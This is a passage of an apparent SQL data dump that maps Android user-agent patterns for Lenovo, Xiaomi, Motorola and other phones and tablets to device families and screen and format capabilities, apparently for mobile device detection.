Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo K910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo K910L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo K920) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo P70-A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo P70-A/S100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo P70-t) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo P780) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo P780_ROW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo P90) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S5000-F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S5000-H/JDQ39) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S580) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S580) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S60-a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S60-w) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S6000L-F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S660) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S660) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S820_ROW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S856) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S860) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S898t) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S898t+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S90-A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S90-U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S920) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S920_ROW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S930) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S939) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo S960) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo TAB 2 A10-70F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo TAB 2 A7-30DC) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo TAB 2 A7-30F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo TAB 2 A7-30H) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo TAB 2 A7-30HC) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo TAB S8-50F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo X2-CU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo X2-EU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo Z2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo Z2w) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LenovoA3300-GV) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LenovoA3300-GV) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LenovoA3300-H) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LenovoA3300-HV) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LenovoS668T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo_A6600) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo_K900_ROW/JOP40D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo_P780/JOP40D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Luna) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Luno) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; M-PPxG501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; M-PPxS470) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; M-PPxS531) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; M040) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; M040) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; M10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; M16C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; M2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; M3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; M4 SS1050) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; M4 SS4350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; M502S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; M571) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MB865) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ME173X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ME173X) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ME301T) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MEDION E4502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MFLogin3T) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MFLoginPh) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MI 3W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MI 4LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MI 4W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MI NOTE LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":698,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MI PAD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MOT-XT910) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MS3A) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MS3B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MS40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MS5.V2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MT2L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MTC 970H) AppleWebKit/* (KHTML, like Gecko) Mobile 